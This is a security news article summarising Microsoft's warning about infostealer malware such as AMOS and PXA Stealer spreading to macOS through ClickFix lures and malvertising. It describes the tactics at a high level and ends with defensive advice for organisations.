Microsoft has issued a warning that information stealing malware campaigns are rapidly expanding beyond Windows systems and increasingly targeting Apple macOS environments. According to the company, attackers are using cross platform programming languages such as Python and abusing trusted advertising and software distribution platforms to scale these attacks.
Researchers from the Microsoft Defender Security Research Team reported that macOS focused infostealer campaigns have been active since late 2025. These operations rely heavily on social engineering methods, including ClickFix style lures, to distribute malicious disk image installers that deploy stealer malware families such as Atomic macOS Stealer (AMOS), MacSync, and DigitStealer.
The observed campaigns employ advanced techniques designed to evade detection, including fileless execution, the abuse of native macOS utilities, and AppleScript based automation. These methods enable attackers to extract sensitive information, including browser stored credentials, active session data, iCloud Keychain contents, and developer related secrets.
Microsoft noted that many of these attacks begin with malicious online advertisements, commonly delivered through Google Ads. Users searching for legitimate software tools, including DynamicLake and artificial intelligence related applications, are redirected to fraudulent websites. These sites use ClickFix prompts to convince users to execute commands or install fake software, ultimately leading to malware infection.
The company explained that Python based infostealers provide attackers with flexibility and speed. These malware strains allow threat actors to quickly reuse code, adapt to different operating systems, and target diverse environments with minimal effort. Distribution often occurs through phishing emails, and the malware is capable of stealing login credentials, session cookies, authentication tokens, credit card data, and cryptocurrency wallet information.
One notable example highlighted by Microsoft is PXA Stealer, which has been linked to Vietnamese speaking threat actors. The malware is capable of collecting browser data, financial details, and login credentials. Microsoft identified two separate PXA Stealer campaigns in October 2025 and December 2025, both of which relied on phishing emails for initial access.
The attack chains used by PXA Stealer included persistence mechanisms such as registry Run keys and scheduled tasks. Telegram was used as the primary command and control channel, as well as for data exfiltration.
In addition to phishing campaigns, threat actors have also been observed abusing popular messaging platforms like WhatsApp to distribute malware such as Eternidade Stealer. These attacks focus on stealing financial and cryptocurrency account data. Details of this activity were publicly documented by LevelBlue and Trustwave in November 2025.
Other related campaigns have involved fake PDF editing tools, including applications branded as Crystal PDF. These tools are promoted through malvertising and search engine optimization poisoning via Google Ads. Once installed, the malware deploys Windows based stealers that silently harvest cookies, session information, and cached credentials from browsers like Mozilla Firefox and Google Chrome.
Microsoft advised organizations to strengthen defenses by educating users about social engineering tactics, including malvertising redirect chains, fake installers, and ClickFix copy paste prompts. Security teams are also encouraged to monitor for suspicious Terminal activity, unusual access to the iCloud Keychain, and outbound network traffic involving POST requests to newly registered or suspicious domains.
According to Microsoft, infections caused by infostealer malware can lead to serious consequences, including data breaches, unauthorized access to internal systems, business email compromise, supply chain attacks, and ransomware incidents.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
